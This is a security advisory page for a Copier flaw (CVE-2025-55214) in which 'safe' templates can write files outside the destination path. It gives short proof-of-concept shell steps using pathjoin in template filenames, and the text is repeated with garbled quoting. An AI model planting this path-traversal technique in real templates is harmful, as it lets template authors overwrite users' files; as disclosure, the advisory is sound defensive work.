Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-p7q8-grrj-3m8w: Copier's safe template has filesystem write access outside destination path

Impact

Copier suggests that it’s safe to generate a project from a safe template, i.e. one that doesn’t use unsafe features like custom Jinja extensions which would require passing the --UNSAFE,--trust flag. As it turns out, a safe template can currently write files outside the destination path where a project shall be generated or updated. This is possible when rendering a generated directory structure whose rendered path is either a relative parent path or an absolute path. Constructing such paths is possible using Copier’s builtin pathjoin Jinja filter and its builtin _copier_conf.sep variable, which is the platform-native path separator. This way, a malicious template author can create a template that overwrites arbitrary files (according to the user’s write permissions), e.g., to cause havoc.

Write access via generated relative path

Reproducible example:

echo "foo" > forbidden.txt
mkdir src/
echo "bar" > "src/{{ pathjoin('..', 'forbidden.txt') }}"
uvx copier copy src/ dst/
cat forbidden.txt

Write access via generated absolute path

Reproducible example:

  • POSIX:

    # Assumption: The current working directory is `/tmp/test-copier-vulnerability/`
    echo "foo" > forbidden.txt
    mkdir src/
    echo "bar" > "src/{{ pathjoin(_copier_conf.sep, 'tmp', 'test-copier-vulnerability', 'forbidden.txt') }}"
    uvx --from copier python -O -m copier copy --overwrite src/ dst/
    cat forbidden.txt
    
  • Windows (PowerShell):

    # Assumption: The current working directory is `C:\Users\<user>\Temp\test-copier-vulnerability`
    echo "foo" > forbidden.txt
    mkdir src
    Set-Content -Path src\copier.yml @'
    drive:
      type: str
      default: "C:"
      when: false
    '@
    echo "bar" > "src\{{ pathjoin(drive, 'Users', '<user>', 'Temp', 'test-copier-vulnerability', 'forbidden.txt') }}"
    uvx --from copier python -O -m copier copy --overwrite src dst
    cat forbidden.txt
    

This scenario is slightly less severe, as Copier has a few assertions of the destination path being relative which would typically be raised. But python -O (or PYTHONOPTIMIZE=x) removes asserts, so these guards may be ineffective. In addition, this scenario will prompt for overwrite confirmation or require the --overwrite flag for non-interactive mode; yet malicious file writes might go unnoticed.

ghsa
#vulnerability#windows#git#auth

Impact

Copier suggests that it’s safe to generate a project from a safe template, i.e. one that doesn’t use unsafe features like custom Jinja extensions which would require passing the --UNSAFE,–trust flag. As it turns out, a safe template can currently write files outside the destination path where a project shall be generated or updated. This is possible when rendering a generated directory structure whose rendered path is either a relative parent path or an absolute path. Constructing such paths is possible using Copier’s builtin pathjoin Jinja filter and its builtin _copier_conf.sep variable, which is the platform-native path separator. This way, a malicious template author can create a template that overwrites arbitrary files (according to the user’s write permissions), e.g., to cause havoc.

Write access via generated relative path

Reproducible example:

echo “foo” > forbidden.txt mkdir src/ echo “bar” > “src/{{ pathjoin('…’, ‘forbidden.txt’) }}” uvx copier copy src/ dst/ cat forbidden.txt

Write access via generated absolute path

Reproducible example:

  • POSIX:

    Assumption: The current working directory is `/tmp/test-copier-vulnerability/`

    echo “foo” > forbidden.txt mkdir src/ echo “bar” > “src/{{ pathjoin(_copier_conf.sep, 'tmp’, 'test-copier-vulnerability’, ‘forbidden.txt’) }}” uvx --from copier python -O -m copier copy --overwrite src/ dst/ cat forbidden.txt

  • Windows (PowerShell):

    Assumption: The current working directory is `C:\Users\<user>\Temp\test-copier-vulnerability`

    echo “foo” > forbidden.txt mkdir src Set-Content -Path src\copier.yml @’ drive: type: str default: “C:” when: false '@ echo “bar” > “src\{{ pathjoin(drive, 'Users’, '<user>’, 'Temp’, 'test-copier-vulnerability’, ‘forbidden.txt’) }}” uvx --from copier python -O -m copier copy --overwrite src dst cat forbidden.txt

This scenario is slightly less severe, as Copier has a few assertions of the destination path being relative which would typically be raised. But python -O (or PYTHONOPTIMIZE=x) removes asserts, so these guards may be ineffective. In addition, this scenario will prompt for overwrite confirmation or require the --overwrite flag for non-interactive mode; yet malicious file writes might go unnoticed.

References

  • GHSA-p7q8-grrj-3m8w
  • https://nvd.nist.gov/vuln/detail/CVE-2025-55214
  • copier-org/copier@fdbc016

ghsa: Latest News

GHSA-vxq6-8cwm-wj99: LibreNMS allows stored XSS in Alert Template name field